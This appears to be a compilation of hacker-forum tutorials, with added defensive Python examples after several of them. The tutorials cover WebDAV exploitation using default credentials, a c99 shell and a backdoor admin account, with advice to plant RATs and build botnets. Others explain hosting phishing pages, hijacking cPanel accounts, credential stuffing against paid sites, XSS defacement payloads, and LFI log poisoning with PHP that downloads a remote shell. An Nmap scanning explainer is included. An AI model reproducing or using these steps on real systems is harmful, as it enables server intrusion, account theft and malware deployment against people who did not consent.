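198.51.100.9 - - [10/Mar/2012:10:00:04 +0000] "GET /games/zip/ HTTP/1.1" 200 980 "-" "Wget/1.13"
198.51.100.9 - - [10/Mar/2012:10:00:05 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "Wget/1.13"
198.51.100.9 - - [10/Mar/2012:10:00:06 +0000] "GET /backup/ HTTP/1.1" 404 210 "-" "Wget/1.13"
198.51.100.9 - - [10/Mar/2012:10:00:07 +0000] "GET /old/ HTTP/1.1" 404 210 "-" "Wget/1.13"
198.51.100.9 - - [10/Mar/2012:10:00:08 +0000] "GET /private/ HTTP/1.1" 404 210 "-" "Wget/1.13"
203.0.113.7 - - [10/Mar/2012:10:00:09 +0000] "GET /favicon.ico HTTP/1.1" 404 210 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Mar/2012:10:00:10 +0000] "PUT /webdav/shell.php HTTP/1.1" 201 0 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
"""

if __name__ == "__main__":
    for ip, reasons in find_probing_clients(SAMPLE_LOG.splitlines()).items():
        print(ip, "->", "; ".join(reasons))
```

The obvious companion fixes are to turn off automatic directory indexes and to not rely on client-side JavaScript for access control at all; the log rules are there because a mirroring run of the kind described above is loud enough to see even when nothing is misconfigured.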

Hack WebDAV & Deface

Alright guys, today in this tutorial I'll be explaining how to use the WebDAV exploit. The link for the tools used in this tutorial can be found at the bottom of this tutorial. For those of you who do not know what WebDAV is, here is the definition: Web-based Distributed Authoring and Versioning, or WebDAV, is a set of extensions to the Hypertext Transfer Protocol (HTTP) that allows computer users to edit and manage files collaboratively on remote World Wide Web servers. But for our purpose we will be using it to exploit RDPs, or the Remote Desktop Protocol. For a better understanding, these RDPs could range from VPSes to dedis to just plain old home PCs, but no matter what it is, you will gain full access to the machine and can basically do whatever you want using a shell. For those of you who are new to the hacking scene, a shell is a PHP script that allows you to view all of the files on the server you decide to host the shell on. The most common shells are the c99 or the r57, but in this case we will be using the c99. Now please be aware these are not the only shells available; there are several posted throughout the forum and you can find them by simply using the search button located on the navbar.

Now before being able to use the shell we have to find some vulnerable IPs to gain access to. For this we will be using the WebdavlinkCrawler, which can be found in the WebDAV tool kit I have provided below. If you don't trust my download links, simply don't download them; it's that simple. Once you have managed to open the program you will be presented with this interface.

As you can see there is a Start, Stop, and Remove Double. All of these terms will be explained later on, but what you are going to want to do is click the Start button and it will begin to search for IPs with WebDAV on them. Once you have managed to gather some IPs like you see in the picture here


Now please be aware this was only with about 15 seconds of searching, and your results may differ depending on your connection speed as well as the amount of time you run the application. After you have all of your IPs, you are going to want to click one so it's highlighted and then right-click it; you will be presented with a popup that looks like this:

I have no idea what that actually means (if someone would like to translate and tell me, please feel free), but what it is doing is copying all of the IPs you have scanned. After you have scanned all of the IPs, you are going to want to paste them into a new Word document.


Once you have done so, save it as something you can remember and put it in a convenient location. After you have saved your collected WebDAV IPs in a Word document, you are going to want to open the IP Scanner in the folder. It will look like this:

What you are going to want to do is click the "Get Ip's" button and browse to your recently saved text file. After you have your IPs in place,

you are going to want to press the Scan button. What this is doing is taking all of your WebDAV IPs and figuring out which ones are vulnerable to this particular exploit. The ones on the right are the ones it scanned, and if you happen to get any in the middle, those are the ones you can exploit. In my case this time I didn't happen to have any that were open to this exploit because I had a limited number of IPs. After you have managed to gather some IPs in the middle column and are ready to exploit the server, you can double-check by going to the IP/webdav/ in your browser, the IP being one of the exploited ones you managed to get, and you are going to be looking for an index page that says "WebDAV Test page". After you have confirmed it is ready to go, you are going to want to open "Map network drive"; this can be found by right-clicking Network or My Computer in the Start menu.

What you are going to want to click on is the hyperlink that reads "Connect to a website that you can use to store your documents and pictures". You will be presented with a screen; all you have to do is click Next. And then you are going to want to click "Choose a custom network location".


Now this is the important screen; it should look like this:

What you have to do is put the IP/webdav in the text box and click Next.


You should then be prompted with a login box; the default username is wampp and the default password is xampp. Once you have successfully connected you can now browse its folders, so what you have to do now is just drag and drop the shell.php inside the main directory.

After doing so go to IP/webdav/shell.php; it should look like the following:


Feel free to use that IP if you are that much of a noob and cannot do anything for yourself. Once you are viewing your shell, inside the execute textbox you are going to want to run the following command:

net localgroup administrators SUPPORT /Add

What this is doing is making the remote desktop username SUPPORT and the password !password!. So now the last and final step is to open Remote Desktop and connect using the IP and the login details we have just created. The shell is for you to explore and discover for yourself.

Now you may be wondering: what can you do once you're in? Answer:

1. You can do so much! Plant rootkits / upload your RAT on the server :D
2. I upload my RATs in case they try to take back their dedi.
3. Host a web IRC bot or shell booter.
4. Store files or host websites or shells.
5. Make a botnet!

TOOLS: http://dl.dropbox.com/u/18083172/Webdav%20tools.rar

How to: Convert Computer in WebServer - Host Webpages For Free

Wanted to know how we can convert our own computer into a web server, so that you may access your public data at any time from any place? Were you eager for this before? OK, Hackersthirst is here to help you in this tech and hacking world. I am going to show you how you can make your computer a web server in order to host your own files and also web pages in HTML. This conversion will help you in creating SQL, PHP and many other databases (visit the download link provided below), so that you may be able to test your website and see how it will look online. There is another benefit: often you get banned by hosting providers for hosting your phishing pages and scripts or some illegal crap, and this will surely help you get out of that mess, and you will be able to host your phishing page freely in order to hack a victim.

For this purpose we can use many software packages like WAMP and others, but I recommend using XAMPP. You can download XAMPP from here. There are many flavors available; you can use it with Linux, Windows and Mac also. After downloading just follow my steps:

Step 1) Download the program and install it (prefer another drive rather than C:\Program Files for installation; otherwise, on Vista and 7, in order to avoid software function restrictions you may have to deactivate UAC (Windows Vista User Account Control) with msconfig later). During installation you will be prompted for the following options; choose what you want. I have just selected the following:

After that press Next and the installation will start:

Step 2) At the end it will ask whether you want to run the XAMPP control panel. Hit OK and you will see the control panel in front of you. Start the following services; you may start others as per your requirements!


Afterwards go to your browser and put 127.0.0.1 or localhost in the browser address bar. You will get the following screen after selecting the right language:

In order to check whether your local hosting is accessible publicly, use your public/external IP address, put it in the browser address bar and hit Enter. You will get this page:


So, you have to edit the "httpd-xampp.conf" file now. Just go to "httpd-xampp.conf", find and remove "Deny from all", and save it. The path of such files is: Your Drive:\xampp\apache\conf\extra

So, after deleting "Deny from all", save it (Ctrl+S) and thus you are done. In the end restart the server by restarting the software, and I hope that it will work now.

Where to host and upload your pages: Yes, this is the most important question. There will be a directory named htdocs where you have installed XAMPP, so I may say it will be in drive:\xampp\htdocs. Whatever you upload into it will be available to the whole world from your public IP address. Suppose you have made index.html; in order to access it you will have to paste it into the htdocs directory, and it will be accessible at:

http://Your-public-ip/index.html OR http://localhost/index.html

Yes, the public IP address link will work in the whole world, while localhost works in your local network, as I described above. You can start and stop services from the XAMPP control panel; you can use FileZilla too.

If you want to get a domain name: Just sign up to no-ip.com and get a domain or host for your IP address. But the question here is that our IP address is dynamic, so which IP will the domain name point to? Yes, there is a solution from no-ip.com: just go to Downloads and get their dynamic DNS update client and run it on the PC. It will automatically point that domain to your current IP address. In order to get more step-wise information for setting up a domain, you should read the start of this post here, where I have used no-ip.com for setting up your own domain name for CyberGate with an IP address.

How to: Setup your own Home ftp Server

This post is about how to set up/make your own FTP server at home, with your personal laptop or computer. Using this server there are many benefits: first, you can access your files from anywhere in the world, and another good thing is that you can upload what you want from anywhere. So it means that you can work on the go on your own PC in a safe environment.
What you will need is this:

1) A 24-hour working Internet connection (as the FTP server will go offline if your computer is not connected to the Internet)
2) My method to convert your computer into an FTP server.

Hope the above things are not a big deal. Let's start the tutorial!

Get a copy of FileZilla FTP Server: You can download it from here. After downloading, surely we have to install it. Installation is simple and just requires Next to be pressed. Now the following step (in the screenshot) will come, and the installation will ask whether to install a service in Windows to start the server. You should choose what you want and what is required; for me the default settings are perfect, as the FTP server will be on by default. See the screenshot below:

By default this is the port number, i.e. 14147. You can also change the port number, but remember that the port must be open. In this post, in the last step, I have already shown some short tricks to open the required port; you can also log in to your modem or router for port forwarding purposes. (After installing the software, if the FTP server doesn't work from outside the homegroup, then check whether the port is forwarded or not; if not, do it manually like I told you.)

After installation is complete: Now run the FileZilla FTP server, and when you run it for the first time it will ask for the administration password and also the port number. Give a password of your choice. Since the server is running on your PC, the same one the admin interface is running on, its address is localhost, or 127.0.0.1. See the screenshot! Note: check the "Always connect to this server" box to bypass this dialog in the future.

a) Creating Server Users:

Now the FTP server is up and running, but no one can use it since the admin hasn't granted permissions to anyone. In other words, you have to add users who will be authorized to use this server. To do this, go to Edit >> Users and then hit the Add button on the right side. Now give a user name, say wamiq as I did, and also give a password, as shown in the screenshot below:

You can also set up SSL for user login for more security. After this we have to select permissions and the folder to be shared, so go to Shared Folders.

Selecting Read only will allow the user to read and download the data, but if you also select Write then the user is capable of writing data too. After that press OK. Now your computer is converted into an FTP server.

Using Your Own Created FTP Server: Now it's time to connect to the server and try uploading and downloading. We have to use an FTP client for this purpose: get FileZilla (recommended), or else there are many others. I have recommended FileZilla as it is freeware and open source; CuteFTP is also available but you may have to purchase it. If you don't know how to use FileZilla go here (How to Upload files to website Using Filezilla). Now, after downloading and installing any FTP client, in the host field put 127.0.0.1 if it's the homegroup, or else use your public IP address (as your external IP address will allow you to connect from anywhere in the world, but for this you have to port-forward from your modem, or consult your DSL provider). Now in the FTP client the user name will be the one we gave above, and the password will also be the one we assigned for the user! As you can see, I have successfully accessed my FTP server using the FTP client FileZilla, so now I can upload and download files using my login, or else I can give it to any friend to upload the required files here.

Hi everyone, today I will show you a method to hack a cPanel on the server very easily.

Requirement: a shelled server + access to the path before public_html.

You have a shell, alright. Go to the path before /public_html ("xxxx/public_html/"); you are going to find a file there called ".contact" or "contactemail". Edit it, replace the address with your email, and save it. Now you have to reset the password of cPanel. To do this:

1. Go to the host.
2. Click the Control Panel Login button.
3. Click the "Forgotten Password" link.
4. Enter your domain name or username.
5. Click "Lookup Account".

Resetting your password:

1. Open your email (the one you put there).

Check the inbox; you will find one message sent from support@targethost.com.
2. Click the reset password link.
3. Enter your new password in the New Password text box.
4. Enter your new password in the New Password (again) text box.
5. Click the Change password button. This will take you to a completion page.
6. Click the RELOGIN option. This will take you to a sign-in page.
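An added example from the defender's side of this cPanel trick (not code from the book): a minimal integrity check for the recovery-contact files the text names (".contact" and "contactemail"). It records a hash and the permission mode of those files, then reports content changes, loosened permissions, or removal, which is exactly the edit the procedure above depends on. The temporary directory, the owner/attacker addresses and the function names are my constructions.

```python
# Added example (not from the book): integrity check for the cPanel
# recovery-contact files that the procedure above edits.
import hashlib
import json
import os
import shutil
import tempfile

WATCHED = (".contact", "contactemail")   # file names quoted from the text


def sha256_of(path: str) -> str:
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def baseline(home: str) -> dict:
    """Record the hash and mode of every watched file that exists under home."""
    snap = {}
    for name in WATCHED:
        p = os.path.join(home, name)
        if os.path.isfile(p):
            snap[name] = {"sha256": sha256_of(p),
                          "mode": oct(os.stat(p).st_mode & 0o777)}
    return snap


def check(home: str, snap: dict) -> list:
    """Compare the current state against a baseline and return findings:
    changed content, changed or loose permissions, missing or new files."""
    now = baseline(home)
    findings = []
    for name in WATCHED:
        before, after = snap.get(name), now.get(name)
        if before and not after:
            findings.append(f"{name}: missing")
        elif after and not before:
            findings.append(f"{name}: new file")
        elif before and after:
            if before["sha256"] != after["sha256"]:
                findings.append(f"{name}: contents changed")
            if before["mode"] != after["mode"]:
                findings.append(f"{name}: mode {before['mode']} -> {after['mode']}")
            if int(after["mode"], 8) & 0o022:
                findings.append(f"{name}: writable by group/other")
    return findings


def demo(scenario: str = "edit") -> list:
    """Build a throwaway home directory, take a baseline, apply one tamper
    scenario ("edit", "loosen", "delete" or "none") and return the report."""
    home = tempfile.mkdtemp()
    p = os.path.join(home, ".contact")
    with open(p, "w") as fh:
        fh.write("owner@example.com\n")          # constructed owner address
    os.chmod(p, 0o600)
    snap = baseline(home)
    if scenario == "edit":                      # the hijack: swap the address
        with open(p, "w") as fh:
            fh.write("attacker@example.com\n")
    elif scenario == "loosen":
        os.chmod(p, 0o666)
    elif scenario == "delete":
        os.remove(p)
    result = check(home, snap)
    shutil.rmtree(home)
    return result


if __name__ == "__main__":
    for scenario in ("none", "edit", "loosen", "delete"):
        print(scenario, "->", json.dumps(demo(scenario)))
```

The baseline belongs somewhere the web-server user cannot write (the whole point is that a shell running as that user can rewrite the contact file), and on a real host the same check would be run from cron and its findings forwarded rather than printed.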

Hacking porn sites: Step 0 - The Tools

1. Athena II
2. Raptor 3
3. Proxy Finder
4. Proxy Checker
5. CForce

Download All Tools! HERE### (https://adf.ly/6bBi)


Step 1 - Athena II
1. Run Athena II.
2. Set up Athena II.
3. Click Start.
4. Wait about 5~10 min. and click Stop...
5. Copy Logins.txt from the Athena II folder to the desktop.

Step 2 - Raptor 3
1. Open Raptor 3.
2. Go to File > Open and in the dialog open logins.txt from the desktop.
3. In Tools click "Remove Duplicates".
4. Go to Filter in Tools > click on the "Custom Filters" tab.
5. Right-click in an empty spot > click "Add".
6. In filter name type "bangbros" > Action: Keep If > Filter Subject: Line > Condition: Has > Amount: Any > Filter: What: bangbros > Click OK.
7. Check the newly made filter and click the Filter button under the empty spot.
8. In Generators select "Pass Leecher" > right-click at the empty spot > click on "Add" > select logins.txt from the desktop > click the "Leech" button under the empty spot.
9. Now go to File > Save All > save the file as Combo.txt on the desktop.

Step 3 - Proxy Finder
1. Open Proxy Finder.
2. Click the "Find" button.
3. When it's done click the "Save" button and save as Proxy.txt on the desktop.

Step 4 - Proxy Checker
1. Open Proxy Checker.
2. In the Proxy field click the "Load" button and load Proxy.txt from the desktop.
3. Click the "Start" button.
4. When it's done click the "Save" button in the Responding Proxys field and save as CheckedProxys.txt on the desktop.

Step 5 - CForce
1. Open CForce.
2. Click on the "Auto" tab.
3. In the URL field type the members login URL of the site that you want to hack.
4. In the "Proxy-List" field click on the "Load" button and load CheckedProxys.txt from the desktop.
5. In the "Combo-List" field click on the "Load" button and load Combo.txt from the desktop.
6. Click Start and wait till it's done.
7. When it's done you will have working logins here.

How to deface website with Cross Site Scripting ? : Complete XSS Tutorial

Defacing is one of the most common things a hacker does after finding a vulnerability in a website: the site's content is replaced with the hacker's own. Most of the time the attacker does it to tell the admin about the vulnerability, but it is a bad idea.
Script for changing the background colour of a website:
<script>document.body.bgColor="red";</script>
Script for changing the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>
Defacement page with Pastehtml: first upload a defacement page (HTML) to pastehtml.com and get the link. When you find an XSS-vulnerable site, insert the script as:
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>
This script redirects the page to your pastehtml defacement page.
Note: only a persistent (stored) XSS changes what every visitor sees. With reflected XSS the payload runs only for whoever opens the crafted URL, so it cannot deface the site for everyone.

ATM Hack: there are 10,000 possible four-digit codes that the digits 0-9 can form. If users pick a four-digit password for an online account or other website, it is not a stretch to assume they use the same number as their four-digit bank PIN, and people are predictable when choosing passwords. Nearly 11% of the 3.4 million four-digit passwords analysed were 1234. The second most popular PIN was 1111 (6% of passwords), followed by 0000 (2%). (A list of the most common numeric and word-based passwords found that "password" and "123456" topped the list.)
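The three defacement scripts above only work because a page somewhere echoes attacker-controlled text into its HTML without escaping it. The following is an added example (not code from the original page) that shows the same pastehtml redirect payload going through a stored comment page and a reflected search page, once with the vulnerable raw rendering and once with output escaping; the comment store, the search page and the CSP header are assumptions used for illustration.

```python
import html

# Constructed sample: the redirect payload from the page, as an attacker would
# submit it in a comment form (stored XSS) or a search parameter (reflected XSS).
DEFACEMENT = '<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>'

# In-memory comment store standing in for the site's database (assumption).
_comments = []


def post_comment(text):
    """Store a comment exactly as submitted; input filtering is not where XSS is fixed."""
    _comments.append(text)


def render_comments_vulnerable():
    """Stored XSS: every visitor receives the raw comment bodies, script tags included,
    which is why a persistent XSS defaces the site for everyone."""
    return "".join(f"<div class='comment'>{c}</div>" for c in _comments)


def render_comments_safe():
    """Same page, but each comment is HTML-escaped on output, so markup becomes text."""
    return "".join(
        f"<div class='comment'>{html.escape(c, quote=True)}</div>" for c in _comments
    )


def render_search_vulnerable(query):
    """Reflected XSS: the query echoes straight back, but only for the visitor who
    opened the crafted URL, so it cannot deface the site for other users."""
    return f"<p>Results for {query}</p>"


def render_search_safe(query):
    return f"<p>Results for {html.escape(query, quote=True)}</p>"


def has_active_markup(rendered):
    """Crude check used in the assertions: did a <script> tag survive into the output?"""
    return "<script" in rendered.lower()


# Defence in depth (assumed header for this example): even if an escape is missed
# somewhere, a CSP without 'unsafe-inline' stops the injected inline script, and
# with it the window.location redirect, from running.
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; script-src 'self'")


if __name__ == "__main__":
    post_comment("nice site")
    post_comment(DEFACEMENT)
    print(render_comments_vulnerable())
    print(render_comments_safe())
```

Running it prints the comment page twice: in the first copy the `<script>` tag is live markup, in the second it appears as literal text (`&lt;script&gt;...`) that the browser displays but never executes.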

A whopping 26.83% of all passwords could be guessed by attempting just 20 four-digit combinations (see first table). Days, months, years: many of the commonly used passwords are, of course, dates: birthdays, anniversaries, year of birth, etc.

Somewhat intriguing was #22 on the most common password list: 2580. It seems random, but if you look at a telephone keypad (or ATM keypad), you'll see those numbers run straight down the middle, yet another sign that we're uncreative and lazy password makers. The Least Predictable Password: the least-used PIN is 8068.

How To Upload a Shell Via an LFI Vulnerability

Today I am going to teach you two ways of uploading a shell via an LFI vulnerability. Requirement: a website vulnerable to LFI.
Method 1: NOTE: you will need Firefox and its add-on Tamper Data for this method.
LFI, or Local File Inclusion, lets you include a local file (one stored on the server) and run it in a web script. In this method we upload a shell through /proc/self/environ.
Our page is: http://www.target.com/index.php?include=register.php
Now we try: http://www.target.com/index.php?include=../

If it gives you an error message, this is good; the best outcome is "No such file or directory". Now add this to your URL:
http://www.target.com/index.php?include=../etc/passwd
As long as the page shows nothing but an error message, keep adding "../" to the URL, so it looks like:
http://www.target.com/index.php?include=../../etc/passwd
http://www.target.com/index.php?include=../../../etc/passwd
http://www.target.com/index.php?include=../../../../etc/passwd
and so on. Now let's say we got to this URL:

http://www.target.com/index.php?include=../../../../etc/passwd
and we see a big dump of text we can't do much with (the contents of /etc/passwd). That confirms the include reads arbitrary files. Now change etc/passwd in the URL to proc/self/environ:
http://www.target.com/index.php?include=../../../../proc/self/environ
If you see text, it worked; if you see an error message, it did not (e.g. the server is not Linux or PHP's open_basedir blocks it). This is where Tamper Data comes in. Start Tamper Data, reload the page, and for the User-Agent header enter the following PHP script:
PHP Code:
<?php
$file = fopen("shell.php", "w+");
$stream = fopen("http://www.website.com/yourshell.txt", "r");
$shell = "";
while (!feof($stream)) {
    $shell .= fgets($stream);
}
fwrite($file, $shell);
fclose($file);
?>
This executes the PHP on the site and creates shell.php on the server. Why? /proc/self/environ holds the environment of the web server process, including the HTTP_USER_AGENT of the current request; when the vulnerable include pulls that file in, the PHP interpreter executes anything in it that looks like PHP code. Now simply access your shell at http://www.target.com/shell.php and you have code execution on the server.
LFI method 2: NOTE: this only works on Apache servers! Go back to the point where we reached etc/passwd. Use the same method, but instead of etc/passwd try to reach the Apache error log, e.g. apache/logs/error.log (the path varies by installation, so you may have to try several). It is exactly the same procedure as for etc/passwd (explained in LFI method 1). Once you have found the file, open cmd and type:
Code: telnet www.target.com 80
Inside the telnet session, paste the following code (with your own shell URL):
PHP Code:
<?php
$file = fopen("shell.php", "w+");
$stream = fopen("http://www.website.com/yourshell.txt", "r");
$shell = "";
while (!feof($stream)) {
    $shell .= fgets($stream);
}
fwrite($file, $shell);
fclose($file);
?>
Press Enter once or maybe twice (until you get an error message). The malformed request is written to error.log verbatim, PHP code included.

Page 233


Now refresh the error.log page in the browser once and there you go: the PHP script is executed and your shell is written to the server. Access it by typing into your browser: http://www.target.com/shell.php ENJOY...
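Both methods above depend on the same root cause: the `include` parameter is joined onto a path without any check, so `../` sequences walk out of the web root and an absolute path like /proc/self/environ replaces it outright. The following added example (not code from the original page; the web root /var/www/html, the page allowlist and the log lines are all constructed for illustration) models that path resolution in Python, shows the hardened version an allowlist plus containment check gives you, and, for the defender, flags the exact requests from this tutorial in a web server access log.

```python
import os
import re

WEBROOT = "/var/www/html"                                   # assumed document root
ALLOWED_PAGES = {"register.php", "index.php", "login.php"}  # assumed page allowlist


def resolve_vulnerable(requested, base=WEBROOT):
    """What `include($_GET['include'])` effectively resolves to relative to the script
    directory: '../' walks out of the web root, and an absolute path discards `base`
    entirely (os.path.join drops `base` for absolute input, as PHP's include does)."""
    return os.path.normpath(os.path.join(base, requested))


def escapes_webroot(requested, base=WEBROOT):
    """True when the resolved path lies outside the web root."""
    target = resolve_vulnerable(requested, base)
    root = os.path.normpath(base)
    return os.path.commonpath([target, root]) != root


def resolve_safe(requested, base=WEBROOT):
    """Hardened version: only allowlisted page names, and the resolved path must still
    sit under the web root. Raises ValueError for anything else."""
    if requested not in ALLOWED_PAGES:
        raise ValueError(f"page not allowed: {requested!r}")
    if escapes_webroot(requested, base):
        raise ValueError(f"path escapes web root: {requested!r}")
    return resolve_vulnerable(requested, base)


# Detection side: constructed access-log lines (not real traffic) reproducing the
# probing sequence from the tutorial: passwd, then /proc/self/environ, then error.log.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?include=register.php HTTP/1.1" 200 1043
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?include=../../../../etc/passwd HTTP/1.1" 200 2201
203.0.113.9 - - [10/Oct/2023:13:55:48 +0000] "GET /index.php?include=../../../../proc/self/environ HTTP/1.1" 200 3310
203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?include=../../../../var/log/apache2/error.log HTTP/1.1" 200 88120
"""

LFI_PARAM = re.compile(r'[?&]include=(?P<value>[^ &"]+)')   # the vulnerable parameter
SUSPICIOUS = re.compile(
    r"(\.\./|%2e%2e%2f|/etc/passwd|/proc/self/environ|error\.log)", re.I
)


def find_lfi_attempts(log_text):
    """Return (client_ip, include_value) for every request that looks like LFI probing."""
    hits = []
    for line in log_text.splitlines():
        m = LFI_PARAM.search(line)
        if m and SUSPICIOUS.search(m.group("value")):
            hits.append((line.split()[0], m.group("value")))
    return hits


if __name__ == "__main__":
    for probe in ("register.php", "../../../../etc/passwd", "/proc/self/environ"):
        print(f"{probe!r:32} -> {resolve_vulnerable(probe)}  escapes={escapes_webroot(probe)}")
    for ip, value in find_lfi_attempts(SAMPLE_LOG):
        print("LFI probe from", ip, ":", value)
```

The containment check alone is not enough for a real fix: an allowlist of page names is what prevents the include from ever being pointed at a log file or /proc entry, which is why `resolve_safe` checks the name first and the path second.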

Learn How To Enable Your Task Manager If It Is Disabled. Enabling Task Manager: nothing needs to be downloaded; everything required is already on your computer. Just follow these easy steps.

Type gpedit.msc in Run. Go to User Configuration > Administrative Templates > System. You will see a window like the one shown:


Click the Ctrl+Alt+Del Options entry. You will see four options:

1. Remove Change Password
2. Remove Lock Computer
3. Remove Task Manager
4. Remove Logoff

Double-click option number 3. You will see a window like this:

Select Not Configured or Disabled. You are done; Task Manager is available again. (gpedit.msc is not included in Home editions of Windows; the policy it sets is the DisableTaskMgr DWORD under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, which you can delete directly in regedit.)

Exception (determine how your computer has been affected): there are two kinds of malware here. One deletes Task Manager (taskmgr.exe) outright; the other sets this policy to Enabled. The deleted case cannot be fixed by these steps; you need an antivirus such as Avast. Only the policy case is fixed by the steps above.

Reinstalling Windows after formatting all the drives and wiping every bit of your data works too, since the infection can live in your data (mostly in .exe files and programs, not in .jpeg or .mp3 files). If you want to keep your data, boot a Linux live USB and copy your precious files onto it; skip backing up programs and take only images, songs and the like. Read here: Make a bootable 100mb Linux USB | Versatile Uses

Or use Avast antivirus to scan all the drives; it may take a long time.

Nmap Footprinting Tool for Hacking and Penetration Testing Defined in Detail

So, here I am with another interesting post, this one in the category of footprinting any machine with a public IP address, i.e. one reachable from your machine, that you want to audit completely: its open ports, the OS it runs and its version, its security, a map of the server. Nmap supports a large variety of scan types for this. I have already posted a list of tools that can be used in hacking; now it is time to introduce them and their use to newbies so that they may benefit. My previous post is here: 10 Best Security And Hacking Tools For Linux and Windows. Download Nmap (Linux, Mac and Windows):

Nmap for Windows
Nmap for Mac
Nmap for Linux

Nmap Defined in Detail: I'll divide the scanning techniques Nmap offers into categories and give a brief introduction to each. So let's start.
TCP Connect scan (-sT): a quite effective scan that reports which ports on a machine (e.g. a server) are open and which are closed. Nmap attempts a full TCP connection to every port in the range; if the connection succeeds the port is reported "open", and if it is refused, "closed". The drawback is that the full connection is visible: if a firewall is running on the target it will notify the admin that someone is probing the ports, and even without one the service itself sees a completed connection and can log it; advanced firewalls also record the scanning IP address and which ports it touched. So a stealthier scan was developed.
SYN (Synchronize) stealth scan (-sS): whenever a TCP connection is created, the two systems exchange three packets (the three-way handshake). Technically, the TCP header has a flags field that tells the receiver what kind of segment it is. The flags that matter here:
SYN (Synchronize): carries the initial sequence number, which lets the remote system know what sequence numbers to expect in subsequent communication.
ACK (Acknowledge):

acknowledges receipt of the other side's data (or of its SYN); almost every segment after the first carries it.
FIN (Finish): sent when the sender has finished sending data and is closing its side of the connection.
RST (Reset): sent to abort a connection immediately, and by a host in reply to a segment aimed at a port with no listener.
Working scheme: to initiate a TCP connection, the initiating system sends a SYN packet to the destination, which responds with a SYN of its own plus an ACK acknowledging the first packet (combined into a single SYN/ACK packet). The first system then sends an ACK for the SYN/ACK, and data transfer can begin. Stealth scanning exploits this scheme: Nmap sends a SYN, and if a SYN/ACK comes back the port is open; Nmap immediately replies with RST instead of ACK, so the handshake never completes and the connection is torn down at once. Because no connection is ever established, the application listening on the port never sees it and has nothing to log (a firewall or IDS watching the packets can still record the SYN).

If RST comes back instead of SYN/ACK, the port is closed. If nothing comes back (or an ICMP unreachable error), the port is filtered: a firewall is dropping the probe, possibly while still allowing certain administrator IPs, so further footprinting is needed to find out how to reach it. The scan can still be logged at the packet level, but other Nmap options explained later, such as timing, make it much harder to detect.

FIN, Null and Xmas Tree scans (denoted in Nmap as -sF, -sN and -sX): these three scan types can be useful. The scheme is this:

Closed ports must respond with RST upon receiving such packets. Open ports must drop the packet silently (they are only "listening for SYN").

So you never create a connection and you never send a SYN. These scan types work against any system whose TCP/IP stack follows RFC 793. Microsoft Windows does not follow it: it replies with RST on every port, open or closed, so every port appears closed. That can be used to detect that the scanned machine runs Windows. For example:

If a SYN scan shows open ports but -sF, -sN or -sX show none, you are most likely footprinting a machine running Windows. Nmap's OS fingerprinting (-O) is still the most reliable way to find the OS.
Ping Scan (denoted in Nmap as -sP, called -sn in current versions): tells you which hosts are online and which are not, rather than which ports are open. Nmap has several host-discovery methods. It first sends an ICMP Echo Request (a ping); if a reply is received the remote machine is up. If not, Nmap tries a TCP ping, because ICMP may be blocked at the remote system, and the TCP ping lets you tell whether the host is really offline or only blocking ICMP. The TCP ping sends SYN and ACK packets to a port (default 80); as described above, any reply means the remote system is online. If there is still no response, the host is down or its traffic is filtered. Host discovery can be skipped entirely with -P0 (P zero), which current versions call -Pn.
UDP Scan (denoted in Nmap as -sU): Nmap sends an empty UDP packet to the target port. An ICMP Port Unreachable reply means the port is closed; no reply means it is open or filtered (a UDP service is not obliged to answer an empty datagram). Microsoft Windows does not rate-limit Port Unreachable messages, so all 65,535 UDP ports of a Windows machine can be scanned in a very short time, whereas Linux rate-limits them and a full UDP scan is slow. UDP scanning is not often useful for most attacks, but it reveals services or Trojans that depend on UDP, for example SNMP, NFS, the Back Orifice backdoor and other exploitable services.
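The connect scan described first above is the one scan type that needs no raw sockets, so it is easy to reproduce outside Nmap. The following added example (not code from the original page or from the Nmap project) performs a TCP connect scan against loopback, classifying ports as open, closed or filtered from the socket outcome exactly as the text describes (SYN/ACK completes the handshake, RST means closed, silence means filtered), and brings its own target: a throwaway listener on an ephemeral port and a port known to have no listener. On a real host the same classification is what `nmap -sT -p <ports> <target>` reports; `-sS` does the half-open version and requires root.

```python
import socket


def tcp_connect_scan(host, ports, timeout=1.0):
    """TCP connect() scan, the equivalent of `nmap -sT`: the OS completes the full
    three-way handshake for every port, so a listening service sees (and can log) a
    real connection. A SYN scan (-sS) needs raw sockets and root; this does not."""
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))          # SYN -> SYN/ACK -> ACK completed
            results[port] = "open"
        except ConnectionRefusedError:       # RST came back: nothing listening
            results[port] = "closed"
        except (socket.timeout, OSError):    # no answer / ICMP unreachable: filtered
            results[port] = "filtered"
        finally:
            s.close()                        # FIN/RST tear-down, also visible to the target
    return results


def start_listener(host="127.0.0.1"):
    """Stand-in target service on an ephemeral port. The kernel completes handshakes
    into the listen backlog even though nobody calls accept(), which is all a scan
    needs to see the port as open."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv


def pick_closed_port(host="127.0.0.1"):
    """Bind and immediately release a port so we know it has no listener."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo():
    """Scan one open and one closed port on loopback; returns (results, open, closed)."""
    srv = start_listener()
    open_port = srv.getsockname()[1]
    closed_port = pick_closed_port()
    try:
        results = tcp_connect_scan("127.0.0.1", [open_port, closed_port])
    finally:
        srv.close()
    return results, open_port, closed_port


if __name__ == "__main__":
    results, _, _ = demo()
    for port, state in sorted(results.items()):
        print(f"{port}/tcp {state}")
```

"filtered" never shows up against loopback because nothing drops packets there; against a firewalled host it is the state you get when the timeout expires with neither SYN/ACK nor RST, which is also why connect and SYN scans slow down dramatically on heavily filtered targets.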
Protect Your Computer, Network, and Wi-Fi From Hackers
